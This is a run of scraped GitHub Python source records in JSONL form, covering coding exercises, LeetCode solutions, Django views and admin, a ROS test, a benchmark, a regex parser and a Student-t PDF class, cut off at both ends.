unittest.main(verbosity=2)\n","repo_name":"Autodesk/maya-usd","sub_path":"test/lib/ufe/testSceneSegment.py","file_name":"testSceneSegment.py","file_ext":"py","file_size_in_byte":4613,"program_lang":"python","lang":"en","doc_type":"code","stars":690,"dataset":"github-code","pt":"16"} +{"seq_id":"39242594256","text":"prompt = (\"\\nPlease state your message\")\nprompt += \"\\n(or enter 'quit' to move on.): \"\n\n# message = \"\"\n# while message != 'quit':\n# message = input(prompt)\n\n# if message != 'quit':\n# print(message)\n\n#using a flag\nactive = True\nwhile active:\n message = input(prompt)\n\n if message == 'quit':\n active = False\n else:\n print(message)\n\n#using break to exit a loop\nprompt = (\"\\nPlease enter food you'd like to order\")\nprompt += \"\\n(or enter 'quit' to end program.): \"\n\nwhile True:\n food = input(prompt)\n\n if food == 'quit':\n break\n else: \n print (f\"We will have your {food.upper()} ready in the next 15 minutes\")","repo_name":"hanna1cho/python_crash_course","sub_path":"input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"45102797009","text":"import rospy\nimport actionlib\n\n\ndef motion_test(self, goals, goal_type=0):\n \"\"\"goals =[left arm, right arm]\"\"\"\n service_name = \"execute_all_joint_poses\"\n group_name = 'dual_arm'\n try:\n rospy.wait_for_service(service_name, 1)\n client = rospy.ServiceProxy(service_name, ExecuteAllJointPoses)\n except rospy.ROSException:\n rospy.logwarn('Service ' + service_name + ' not available')\n return None\n req = ExecuteAllJointPosesRequest()\n req.group_name = group_name\n req.goals = ros_utils.to_posearray_msg(goals)\n req.goal_type = goal_type\n resp = client(req)\n if resp.result_status == resp.FAILED:\n rospy.logerr('execute both joint pose failed')\n return False\n return True\n\ndef main():\n\n rospy.init_node(\"nachi_test\")\n arm_grasp.run_ee_sim()\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"zhengshuai1/robotiqcustom_ws","sub_path":"scripts/utils/srv_test.py","file_name":"srv_test.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34138868113","text":"#\n# @lc app=leetcode id=236 lang=python3\n#\n# [236] Lowest Common Ancestor of a Binary Tree\n#\n# https://leetcode.com/problems/lowest-common-ancestor-of-a-binary-tree/description/\n#\n# algorithms\n# Medium (42.53%)\n# Likes: 3115\n# Dislikes: 164\n# Total Accepted: 412.6K\n# Total Submissions: 953.4K\n# Testcase Example: '[3,5,1,6,2,0,8,null,null,7,4]\\n5\\n1'\n#\n# Given a binary tree, find the lowest common ancestor (LCA) of two given nodes\n# in the tree.\n# \n# According to the definition of LCA on Wikipedia: “The lowest common ancestor\n# is defined between two nodes p and q as the lowest node in T that has both p\n# and q as descendants (where we allow a node to be a descendant of itself).”\n# \n# Given the following binary tree:  root = [3,5,1,6,2,0,8,null,null,7,4]\n# \n# \n# \n# Example 1:\n# \n# \n# Input: root = [3,5,1,6,2,0,8,null,null,7,4], p = 5, q = 1\n# Output: 3\n# Explanation: The LCA of nodes 5 and 1 is 3.\n# \n# \n# Example 2:\n# \n# \n# Input: root = [3,5,1,6,2,0,8,null,null,7,4], p = 5, q = 4\n# Output: 5\n# Explanation: The LCA of nodes 5 and 4 is 5, since a node can be a descendant\n# of itself according to the LCA definition.\n# \n# \n# \n# \n# Note:\n# \n# \n# All of the nodes' values will be unique.\n# p and q are different and both values will exist in the binary tree.\n# \n# \n#\n\n# @lc code=start\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def lowestCommonAncestor(self, root: 'TreeNode', p: 'TreeNode', q: 'TreeNode') -> 'TreeNode':\n \"\"\"\n ✔ Your runtime beats 23.52 % of python3 submissions\n ✔ Your memory usage beats 5.55 % of python3 submissions (29.1 MB)\n \"\"\"\n self.preorder = 0\n found = set()\n post = []\n def dfs(node):\n if node:\n self.preorder += 1\n if node is p:\n found.add(node)\n if node is q:\n found.add(node)\n \n node.preorder = self.preorder\n dfs(node.left)\n dfs(node.right)\n node.postorder = len(post) + 1\n post.append(node)\n \n dfs(root)\n \n mn_preorder = [f.preorder for f in found]\n mx_postorder = [f.postorder for f in found]\n \n for node in post:\n if node.preorder <= min(mn_preorder) and node.postorder >= max(mx_postorder):\n return node\n\n def lowestCommonAncestor(self, root, p, q):\n \"\"\"\n @ stefan\n ✔ Your runtime beats 6.8 % of python3 submissions\n ✔ Your memory usage beats 5.55 % of python3 submissions (39.1 MB)\n \"\"\"\n if root in (None, p, q): return root\n l, r = (self.lowestCommonAncestor(subtree, p, q) for subtree in (root.left, root.right))\n return root if l and r else l or r\n\n\n def lowestCommonAncestor(self, root, p, q):\n \"\"\"\n official answer\n \"\"\"\n def recur(node):\n if not node: return False\n left = recur(node.left)\n right = recur(node.right)\n mid = node == p or node == q\n if mid + left + right >= 2:\n self.ans = node\n return mid or left or right\n self.ans = None\n recur(root)\n return self.ans\n\n# @lc code=end\n","repo_name":"nickyfoto/lc","sub_path":"python/tests/236_lowest_common_ancestor_of_a_binary_tree.py","file_name":"236_lowest_common_ancestor_of_a_binary_tree.py","file_ext":"py","file_size_in_byte":3411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11532204952","text":"from core.models import Role\nfrom .models import AccountUser, PermissionLog\nfrom .serializers import AccountUserSerializers, PermissionLogSerializers, UserSerializer\nfrom rest_framework import viewsets\nfrom django.contrib.auth.models import User\n\n\nclass AccountUserViewSet(viewsets.ModelViewSet):\n serializer_class = AccountUserSerializers\n queryset = AccountUser.objects.all()\n\n def perform_create(self, serializer):\n super().perform_create(serializer)\n\n fields = {\n 'properties': serializer.instance.properties.values_list('id', flat=True),\n }\n try:\n serializer.instance.log_role_change(\n source=PermissionLog.ACCOUNT_USER_CREATED,\n type_of_change=PermissionLog.ROLE_CHANGED,\n new_role=serializer.instance.role\n )\n\n serializer.instance.log_property_change(\n source=PermissionLog.ACCOUNT_USER_CREATED,\n type_of_change=PermissionLog.PROPERTY_CHANGED,\n new_props=list(fields.get('properties')),\n old_props=list()\n )\n except Exception as e:\n # logger.exception(e)\n print(e)\n pass\n\n def perform_update(self, serializer):\n instance = self.get_object()\n\n previous_fields = {\n 'properties': list(instance.properties.values_list('id', flat=True)),\n 'role': getattr(instance.role, \"pk\", None),\n }\n\n super().perform_update(serializer)\n\n previous_property_ids = set(previous_fields['properties'])\n property_ids = set(list(serializer.instance.properties.values_list('id', flat=True)))\n\n fields = {\n 'properties': list(property_ids.symmetric_difference(previous_fields['properties'])),\n 'role': (serializer.instance.role.pk,) if serializer.instance.role.pk != previous_fields['role'] else []\n }\n # logging start here\n instance.log_role_change(\n source=PermissionLog.ACCOUNT_USER_UPDATED,\n type_of_change=PermissionLog.ROLE_CHANGED,\n old_role=instance.role,\n new_role=serializer.instance.role\n )\n\n added_properties = property_ids - previous_property_ids\n removed_properties = previous_property_ids - property_ids\n\n if added_properties or removed_properties:\n instance.log_property_change(\n source=PermissionLog.ACCOUNT_USER_UPDATED,\n type_of_change=PermissionLog.PROPERTY_CHANGED,\n new_props=added_properties,\n old_props=removed_properties\n )\n\n def perform_destroy(self, instance):\n fields = {\n 'properties': instance.properties.values_list('id', flat=True),\n 'role': getattr(instance.role, \"pk\", None)\n }\n instance.log_role_change(\n source=PermissionLog.ACCOUNT_USER_DELETED,\n type_of_change=PermissionLog.ROLE_CHANGED,\n old_role=instance.role,\n )\n instance.log_property_change(\n source=PermissionLog.ACCOUNT_USER_DELETED,\n type_of_change=PermissionLog.PROPERTY_CHANGED,\n old_props=list(fields.get('properties')),\n new_props=list()\n )\n super().perform_destroy(instance)\n\n\nclass PermissionLogView(viewsets.ModelViewSet):\n serializer_class = PermissionLogSerializers\n queryset = PermissionLog.objects.all()\n\n\nclass UserViewSet(viewsets.ModelViewSet):\n serializer_class = UserSerializer\n queryset = User.objects.all()\n","repo_name":"cloverananya/13094","sub_path":"manager/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21701685393","text":"from nautilus_trader.core.correctness import PyCondition\nfrom nautilus_trader.test_kit.performance import PerformanceHarness\n\n\nclass TestCorrectnessConditionPerformance(PerformanceHarness):\n def test_condition_none(self):\n self.benchmark.pedantic(\n target=PyCondition.none,\n args=(None, \"param\"),\n iterations=100_000,\n rounds=1,\n )\n # ~0.0ms / ~0.1μs / 142ns minimum of 100,000 runs @ 1 iteration each run.\n\n def test_condition_true(self):\n self.benchmark.pedantic(\n target=PyCondition.true,\n args=(True, \"this should be true\"),\n iterations=100_000,\n rounds=1,\n )\n # ~0.0ms / ~0.1μs / 149ns minimum of 100,000 runs @ 1 iteration each run.\n\n # 100000 iterations @ 12ms with boolean except returning False\n # 100000 iterations @ 12ms with void except returning * !\n\n def test_condition_valid_string(self):\n self.benchmark.pedantic(\n target=PyCondition.valid_string,\n args=(\"abc123\", \"string_param\"),\n iterations=100_000,\n rounds=1,\n )\n # ~0.0ms / ~0.2μs / 205ns minimum of 100,000 runs @ 1 iteration each run.\n\n def test_condition_type_or_none(self):\n self.benchmark.pedantic(\n target=PyCondition.type_or_none,\n args=(\"hello\", str, \"world\"),\n iterations=100_000,\n rounds=1,\n )\n # ~0.0ms / ~0.2μs / 224ns minimum of 100,000 runs @ 1 iteration each run.\n","repo_name":"nautechsystems/nautilus_trader","sub_path":"tests/performance_tests/test_perf_correctness.py","file_name":"test_perf_correctness.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":1199,"dataset":"github-code","pt":"16"} +{"seq_id":"5215328964","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\n@author: wushaohong\n@time: 2019-09-26 09:46\n\"\"\"\n\"\"\"给定一个非负整数数组,你最初位于数组的第一个位置。\n\n数组中的每个元素代表你在该位置可以跳跃的最大长度。\n\n你的目标是使用最少的跳跃次数到达数组的最后一个位置。\n\n示例:\n\n输入: [2,3,1,1,4]\n输出: 2\n解释: 跳到最后一个位置的最小跳跃数是 2。\n  从下标为 0 跳到下标为 1 的位置,跳 1 步,然后跳 3 步到达数组的最后一个位置。\n说明:\n\n假设你总是可以到达数组的最后一个位置。\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/jump-game-ii\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\"\"\"\n\n\nclass Solution:\n def jump(self, nums) -> int:\n n = len(nums)\n dp = [float(\"inf\")] * n\n dp[0] = 0\n for i in range(1, len(nums)):\n for j in range(i):\n if nums[j] >= i - j:\n dp[i] = min(dp[i], dp[j] + 1)\n # print(dp)\n return dp[-1]\n\n def jump2(self, nums) -> int:\n # if len(nums) == 1:\n # return 0\n count = 0\n point = 0\n while point < len(nums) and nums[point] < len(nums) - point - 1:\n temp = 0\n p = point\n for i in range(1, nums[p] + 1):\n if nums[p + i]+p+i >= temp:\n temp = nums[p + i]+p+i\n point = p + i\n count += 1\n\n return count + 1\n\n\ndef jump(nums):\n end = 0\n maxPosition = 0\n steps = 0\n for i in range(len(nums) - 1):\n # 找能跳的最远的\n maxPosition = max(maxPosition, nums[i] + i)\n if i == end:\n # 遇到边界,就更新边界,并且步数加一\n end = maxPosition\n steps += 1\n return steps\n\n\nif __name__ == '__main__':\n sol = Solution()\n print(sol.jump([2, 3, 1, 1, 4]))\n print(sol.jump2([2, 3, 1, 1, 4]))\n print(jump([2, 3, 1, 1, 4]))\n","repo_name":"hshrimp/letecode_for_me","sub_path":"letecode/1-120/25-48/45.py","file_name":"45.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"13819264471","text":"\"\"\"Regex, I think.\"\"\"\nimport re\n\n\nclass Entry:\n \"\"\"Entry class.\"\"\"\n\n def __init__(self, first_name: str, last_name: str, id_code: str, phone_number: str, date_of_birth: str,\n address: str):\n \"\"\"Init.\"\"\"\n self.first_name = first_name\n self.last_name = last_name\n self.id_code = id_code\n self.phone_number = phone_number\n self.date_of_birth = date_of_birth\n self.address = address\n\n def format_date(self):\n \"\"\"\n Return the date in the following format: 'Day: {day}, Month: {month}, Year: {year}'.\n\n Just for fun, no points gained or lost from this.\n\n Example: 'Day: 06, Month: 11, Year: 1995'\n If the object doesn't have date of birth given, return None.\n :return:\n \"\"\"\n date = self.date_of_birth\n if date is not None:\n date_list = date.split(\"-\")\n for i in range(len(date_list)):\n if i == 0:\n day = date_list[i]\n elif i == 1:\n month = date_list[i]\n elif i == 2:\n year = date_list[i]\n return f'Day: {day}, Month: {month}, Year: {year}'\n\n def __repr__(self) -> str:\n \"\"\"Object representation.\"\"\"\n return f\"Name: {self.first_name} {self.last_name}\\n\" \\\n f\"ID code: {self.id_code}\\n\" \\\n f\"Phone number: {self.phone_number}\\n\" \\\n f\"Date of birth: {self.format_date()}\\n\" \\\n f\"Address: {self.address}\"\n\n def __eq__(self, other) -> bool:\n \"\"\"\n Compare two entries.\n\n This method is perfect. Don't touch it.\n \"\"\"\n return self.first_name == other.first_name \\\n and self.last_name == other.last_name \\\n and self.id_code == other.id_code \\\n and self.phone_number == other.phone_number \\\n and self.date_of_birth == other.date_of_birth \\\n and self.address == other.address\n\n\ndef parse(row: str) -> Entry:\n \"\"\"\n Parse data from input string.\n\n :param row: String representation of the data.\n :return: Entry object with filled values\n \"\"\"\n regex = re.finditer(r\"(^[A-ZÕÜÖÄ]+[a-züõöä]+)?\"\n r\"([A-ZÕÜÖÄ]+[a-züõöä]+(?=\\d))?\"\n r\"([\\d]{11})\"\n r\"((?<=[\\d]{3})\\+[0-9]{3} ?[0-9]{7,8}|(?<=[\\d]{11})[0-9]{7,8})?\"\n r\"(\\d\\d-\\d\\d-\\d\\d\\d\\d)?\"\n r\"([\\w\\D\\d]+)?\", row)\n for match in regex:\n first_name = match.group(1)\n last_name = match.group(2)\n id_code = match.group(3)\n phone_number = match.group(4)\n date_of_birth = match.group(5)\n address = match.group(6)\n entry = Entry(first_name, last_name, id_code, phone_number, date_of_birth, address)\n return entry\n\n\nif __name__ == '__main__':\n print(parse('PriitPann39712047623+372 5688736402-12-1998Oja 18-2,Pärnumaa,Are'))\n \"\"\"\n Name: Priit Pann\n ID code: 39712047623\n Phone number: +372 56887364\n Date of birth: Day: 02, Month: 12, Year: 1998\n Address: Oja 18-2,Pärnumaa,Are\n \"\"\"\n print()\n print(parse('39712047623+372 5688736402-12-1998Oja 18-2,Pärnumaa,Are'))\n \"\"\"\n Name: None None\n ID code: 39712047623\n Phone number: +372 56887364\n Date of birth: Day: 02, Month: 12, Year: 1998\n Address: Oja 18-2,Pärnumaa,Are\n \"\"\"\n print()\n print(parse('PriitPann3971204762302-12-1998Oja 18-2,Pärnumaa,Are'))\n \"\"\"\n Name: Priit Pann\n ID code: 39712047623\n Phone number: None\n Date of birth: Day: 02, Month: 12, Year: 1998\n Address: Oja 18-2,Pärnumaa,Are\n \"\"\"\n print()\n print(parse('PriitPann39712047623+372 56887364Oja 18-2,Pärnumaa,Are'))\n \"\"\"\n Name: Priit Pann\n ID code: 39712047623\n Phone number: +372 56887364\n Date of birth: None\n Address: Oja 18-2,Pärnumaa,Are\n \"\"\"\n print()\n print(parse('PriitPann39712047623+372 5688736402-12-1998'))\n \"\"\"Name: Priit Pann\n ID code: 39712047623\n Phone number: +372 56887364\n Date of birth: Day: 02, Month: 12, Year: 1998\n Address: None\n \"\"\"\n","repo_name":"Krissuper11/Python","sub_path":"EX/ex06_regex/entry.py","file_name":"entry.py","file_ext":"py","file_size_in_byte":4160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37861849632","text":"#!/usr/bin/env python3\n# coding: UTF-8\n# Author: David\n# Email: youchen.du@gmail.com\n# Created: 2017-09-15 15:08\n# Last modified: 2017-10-07 17:16\n# Filename: create_fake_db.py\n# Description:\nimport sys\nimport os\nimport django\n\nbase_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nprint(base_dir)\nsys.path.append(base_dir)\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"SRPA.settings\")\ndjango.setup()\n\nfrom django.contrib.auth.models import User, Group\nfrom authentication import USER_IDENTITY_STUDENT, USER_IDENTITY_TEACHER\nfrom authentication import INSTITUTES\nfrom authentication.models import StudentInfo, TeacherInfo\nfrom const.models import Site, Workshop\nfrom SiteReservation.models import Reservation\nfrom ProjectApproval.models import Project, SocialInvitation\nfrom tools.utils import assign_perms\n\n\ndef create_student_info(num=10, prefix='student_'):\n students = []\n for i in range(1, 1 + num):\n user = User.objects.create_user(\n username=prefix + str(i),\n password=str(i),\n first_name=str(i))\n info = StudentInfo(\n user=user, identity=USER_IDENTITY_STUDENT,\n phone=str(i), student_id=str(i))\n info.save()\n assign_perms('studentinfo', user, info)\n assign_perms('reservation', user, perms='add',\n app_name='SiteReservation')\n assign_perms('project', user, perms='add',\n app_name='ProjectApproval')\n students.append(info)\n return students\n\n\ndef create_teacher_info(num=10, prefix='teacher_'):\n teachers = []\n for i in range(1, 1 + num):\n user = User.objects.create_user(\n username=prefix + str(i),\n password=str(i),\n first_name=str(i))\n info = TeacherInfo(\n user=user, identity=USER_IDENTITY_TEACHER)\n info.save()\n assign_perms('teacherinfo', user, info)\n teachers.append(info)\n return teachers\n\n\ndef create_site(num=10, prefix='site_'):\n for i in range(1, 1 + num):\n site = Site(desc=prefix + str(i))\n site.save()\n\n\ndef create_workshop(num=10, prefix='workshop_'):\n for i in range(1, 1 + num):\n desc = prefix + str(i)\n group, _ = Group.objects.get_or_create(name=desc)\n workshop = Workshop(desc=desc, group=group)\n workshop.save()\n\n\ndef main():\n create_student_info()\n teachers = create_teacher_info()\n create_site()\n create_workshop()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Time1ess/SRPA","sub_path":"scripts/create_fake_db.py","file_name":"create_fake_db.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"28504431764","text":"import os\nimport sqlite3\nfrom sqlite3.dbapi2 import OperationalError\nimport requests\nimport datetime\n\nAPI_ROOT = 'https://opensky-network.org/api'\n\nos.chdir('D:/Works_Backups/Python/flytech/flytech')\n\nr = requests.get(url=API_ROOT + '/states/all')\ntime = r.json()['time']\nctime = datetime.datetime.fromtimestamp(time).strftime('%Y-%m-%d - %H:%M:%S')\n# states is a two dimensional list\nstates = r.json()['states']\nconn = sqlite3.connect('apadana.sqlite3')\ncur = conn.cursor()\ntry:\n data = cur.execute('SELECT id FROM dflight')\nexcept OperationalError:\n sql = \"\"\"CREATE TABLE dflight(\n id integer NOT NULL PRIMARY KEY AUTOINCREMENT,\n icao varchar(8),\n callsign varchar(10),\n country varchar(100),\n updated DATETIME\n );\"\"\"\n cur.execute(sql)\n print('dflight created')\nfor state in states:\n sql = \"\"\"INSERT INTO dflight (icao, callsign, country, updated)\n VALUES(?, ?, ?, ?);\"\"\"\n cur.execute(sql, (state[0], state[1], state[2], ctime))\nconn.commit()\nconn.close()\n","repo_name":"ebikdeli/flytech","sub_path":"assets/flight_data.0eba16b8e7c5.py","file_name":"flight_data.0eba16b8e7c5.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39932033375","text":"class Solution:\n def merge(self, intervals):\n l = sorted(intervals, key = lambda x:(x[0], x[1]))\n res = []\n for i in range(len(l)):\n low, high = l[i][0], l[i][1]\n if res and low <= res[-1][1]:\n res[-1][1] = max(res[-1][1], high)\n else:\n res.append([low, high])\n return res","repo_name":"mihir254/LeetCode","sub_path":"Medium/56-Merge-Intervals.py","file_name":"56-Merge-Intervals.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"30594513347","text":"from account import Bank\n\nclass ATM:\n\n def __init__(self, screen, card_reader, cash_dispenser,\n cheque_deposit_slot, cash_deposit_slot, printer):\n self.amount = 0\n self.screen = screen\n self.card_reader = card_reader\n self.cash_dispenser = cash_dispenser\n self.cash_deposit_slot = cash_deposit_slot\n self.cheque_deposit_slot = cheque_deposit_slot\n self.printer = printer\n self.account = None\n bank=Bank()\n bank.prepare_bank()\n\n def add_cash(self, amount):\n self.amount = amount\n\n def add_cash_customer(self, amount):\n self.amount += amount\n self.account.add_cash(amount)\n\n def debit_cash(self, amount):\n if self.account.amount < amount:\n raise Exception(\"you dont have enough cash\")\n\n if amount > self.amount:\n raise Exception(\"Not Enough Cash in atm\")\n self.amount -= amount\n self.account.amount -= amount\n\n def detail(self):\n msg = \"amount :\" + str(self.amount)\n self.screen.print_(msg)\n\n def enquiry(self):\n self.account.enquiry()\n\n def transfer(self, account_no, amount):\n bank = Bank()\n transfer_account = bank.get_account_by_no(account_no)\n self.account.check_amount_enough(amount)\n self.account.debit_cash(amount)\n transfer_account.add_cash(amount)\n","repo_name":"rnshaikh/SSD","sub_path":"ATM/atm.py","file_name":"atm.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"6290551652","text":"import sys\nsys.setrecursionlimit(10**5)\n\nN, M = map(int, sys.stdin.readline().split())\n\nboard = [list(map(int, sys.stdin.readline().split())) for _ in range(N)]\n\n\nisVisits = [[False for _ in range(M)] for _ in range(N)]\n\ndx = [-1, 0, 1, 0]\ndy = [0, -1, 0, 1]\n\ndef dfs(x, y):\n for k in range(4):\n nx = x + dx[k]\n ny = y + dy[k]\n if 0 <= nx < N and 0 <= ny < M and isVisits[nx][ny]:\n isVisits[nx][ny] = False\n if board[nx][ny]:\n dfs(nx, ny)\narea = 0\nwhile True:\n area += 1\n for x in range(N):\n for y in range(M):\n if board[x][y]:\n isVisits[x][y] = True\n for k in range(4):\n nx = x + dx[k]\n ny = y + dy[k]\n if 0 <= nx < N and 0 <= ny < M and not isVisits[nx][ny]:\n if not board[nx][ny]:\n board[x][y] -= 1\n if board[x][y] == 0:\n break\n print(*board, sep='\\n')\n check = 0\n for x in range(N):\n for y in range(M):\n if board[x][y] and isVisits[x][y]:\n dfs(x, y)\n check += 1\n elif not board[x][y] and isVisits[x][y]:\n isVisits[x][y] = False\n\n if check >= 2:\n print(area)\n break\n elif check == 0:\n print(0)\n break\n\n","repo_name":"saint6839/jungle-week-03","sub_path":"Week03/saint6839/2573.py","file_name":"2573.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"35078600685","text":"# Register your models here.\nfrom django.contrib import admin\nfrom .models import Body,TurorialCategory,TurorialSeries,Turorial\n\nclass ProductAdmin(admin.ModelAdmin):\n\tlist_display=['title','tutorial_slug','published']\t\n\tclass Meta:\n\t\tmodel= Turorial\n\nadmin.site.register(Body)\nadmin.site.register(TurorialSeries)\nadmin.site.register(TurorialCategory)\nadmin.site.register(Turorial,ProductAdmin)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#class PlaceAdmin(admin.ModelAdmin):\n#\tsearch_fields=['name','description']\n#\tlist_editable=['price','active','featured']\n#\tclass Meta:\n#\t\tmodel= Places\n\n#class BodyAdmin(admin.ModelAdmin):\n#\tsearch_fields=['description']\n#\tlist_display=['description','featured','updated']\n#\tlist_editable=['description','featured']\n#\tclass Meta:\n#\t\tmodel= Body\n\n#class QuotepicsAdmin(admin.ModelAdmin):\n#\tsearch_fields=['description']\n#\tlist_display=['description','featured']\n#\tlist_editable=['description','featured']\n#\tclass Meta:\n#\t\tmodel= Quotepics\n\n\n\n\n#admin.site.register(Places,PlacesAdmin)\n#admin.site.register(DiscountField)\n\n\n\n#from . import models\n#from .models import Places,DiscountField,Body,Quotepics\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#from .models import Product,ProductImage,HomePage\n\n#class ProductAdmin(admin.ModelAdmin):\n#\tsearch_fields=['title','description','slug']\n#\tlist_display=['title','price','active','updated']\n#\tlist_editable=['price','active']\n#\tclass Meta:\n#\t\tmodel= Product\n\n#admin.site.register(Product,ProductAdmin)\n\n#admin.site.register(ProductImage)\n\n#admin.site.register(HomePage)","repo_name":"shivamsjjha/django_product_management_app","sub_path":"products/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"28506185644","text":"\"\"\"\nA multivariate Student-t PDF.\n\nAuthor:\n Panagiotis Tsilifis\n\nDate:\n 6/5/2014\n\n\"\"\"\n\n\n__all__ = ['MultivariateT']\n\n\nimport numpy as np\nimport math\nimport scipy.linalg\nfrom scipy import special\nfrom . import make_vector\nfrom . import call_many\nfrom . import PDFBase\n\n\nclass MultivariateT(PDFBase):\n\n \"\"\"\n A class representing the PDF of a multivariate Normal distribution.\n\n :param mu: The location of the distribution.\n :type mu: :class:`numpy.ndarray`\n :param C: The scale matrix. It is taken to be the unit matrix,\n if it is not specified.\n :type C: :class:`numpy.ndarray`\n\n :param nu: The degrees of freedom\n :type nu: Integer\n\n \"\"\"\n\n # The location\n _mu = None\n\n # The scale matrix\n _C = None\n\n # The degrees of freedom\n _nu = None\n\n # The Cholesky decomposition of C\n _L = None\n\n # The log of determinant of C\n _log_det_C = None\n\n # The inverse of C\n _inv_C = None\n\n @property\n def mu(self):\n \"\"\"\n :getter: The location of the distribution. Internally, it is represented\n as a row matrix.\n :setter: Set mu.\n \"\"\"\n return self._mu\n\n @mu.setter\n def mu(self, value):\n \"\"\"\n Set mu.\n \"\"\"\n value = make_vector(value)\n assert value.shape[0] == self.num_dim\n self._mu = value\n\n @property\n def C(self):\n \"\"\"\n :getter: The scale matrix.\n :setter: Set scale matrix.\n \"\"\"\n return self._C\n\n @C.setter\n def C(self, value):\n \"\"\"\n Set the covariance matrix\n \"\"\"\n assert value.ndim == 2\n assert value.shape[0] == self.num_dim and value.shape[1] == self.num_dim\n self._C = value\n # If the following fails, then we have a rank defficient covariance\n try:\n self._L = scipy.linalg.cho_factor(self.C, lower=True)\n self._inv_C = scipy.linalg.cho_solve(self.L, np.eye(self.num_dim))\n self._log_det_C = 2. * np.sum(np.log(np.diag(self.L[0])))\n except scipy.linalg.LinAlgError as e:\n # In this case, we need to find any matrix L such that C = L * L^T.\n # Only sampling will work. The log PDF, the gradient and the Hessian are\n # garbage in this case.\n self._inv_C = np.zeros((self.num_dim, self.num_dim))\n self._log_det_C = 0.\n lam, V = scipy.linalg.eigh(self.C)\n idx = lam > 1e-10\n lam = lam[idx]\n V = V[:, idx]\n L = np.dot(V, np.diag(np.sqrt(lam)))\n Cp = np.dot(L, L.T)\n self._L = (L, None)\n\n @property\n def L(self):\n \"\"\"\n :getter: The Cholesky decomposition of C.\n \"\"\"\n return self._L\n\n @property\n def log_det_C(self):\n \"\"\"\n :getter: The logarithm of the determinant of ``C``.\n \"\"\"\n return self._log_det_C\n\n @property\n def inv_C(self):\n \"\"\"\n :getter: The inverse of ``C``.\n \"\"\"\n return self._inv_C\n\n @property\n def nu(self):\n \"\"\"\n :getter: The degrees of freedom.\n :setter: Set nu.\n \"\"\"\n return self._nu\n\n @nu.setter\n def nu(self, value):\n \"\"\"\n Set nu.\n \"\"\"\n #assert isinstance(value, int)\n self._nu = value\n\n def __init__(self, mu, nu, C=None, name='Multivariate Student-t'):\n \"\"\"\n Initialize the object.\n \"\"\"\n self._mu = make_vector(mu)\n super(MultivariateT, self).__init__(self.mu.shape[0], name=name)\n if C is None:\n C = np.eye(self.num_dim)\n self.C = C\n self.nu = nu\n # const is the part of the likelihood that does not depend on any parameter\n self._const = -0.5 * self.num_dim * math.log(math.pi)\n\n def _eval(self, x):\n \"\"\"\n Evaluate the log of the PDF at x.\n \"\"\"\n t = scipy.linalg.solve_triangular(self.L[0], self.mu - x, lower=self.L[1])\n z1 = -np.log(special.gamma(self.nu / 2.))\n z2 = -0.5 * self.num_dim * np.log(self.nu)\n z3 = -0.5 * (self.nu + self.num_dim) * np.log(1. + np.dot(t.T, t) / self.nu)\n z4 = np.log(special.gamma((self.nu + self.num_dim) / 2.))\n return z1 + z2 + self._const - 0.5 * self.log_det_C + z3 + z4\n\n def _eval_grad(self, x):\n \"\"\"\n Evaluate the gradient of the log of the PDF at x.\n \"\"\"\n t = scipy.linalg.solve_triangular(self.L[0], self.mu - x, lower=self.L[1])\n quadr = 1 + np.dot(t.T, t) / self.nu\n res = scipy.linalg.cho_solve(self.L, self.mu - x)[None, :]\n return (self.nu + self.num_dim) * res / (quadr * self.nu)\n\n def _eval_hessian(self, x):\n \"\"\"\n Evaluate the Hessian of the log of the PDF at x.\n \"\"\"\n t = scipy.linalg.solve_triangular(self.L[0], self.mu - x, lower=self.L[1])\n quadr = 1 + np.dot(t.T, t) / self.nu\n res = scipy.linalg.cho_solve(self.L, self.mu - x)\n return (self.nu + self.num_dim) * ( 2. * np.dot(res, np.transpose(res)) / quadr - self.inv_C ) / (quadr * self.nu)\n\n def _eval_grad_mu(self, x):\n \"\"\"\n Evaluate the gradient with respect to mu at x.\n \"\"\"\n return -self._eval_grad(x)\n\n def grad_mu(self, x):\n \"\"\"\n Evaluate the derivative with respect to mu at x.\n \"\"\"\n return call_many(x, self._eval_grad_mu)\n\n def __str__(self):\n 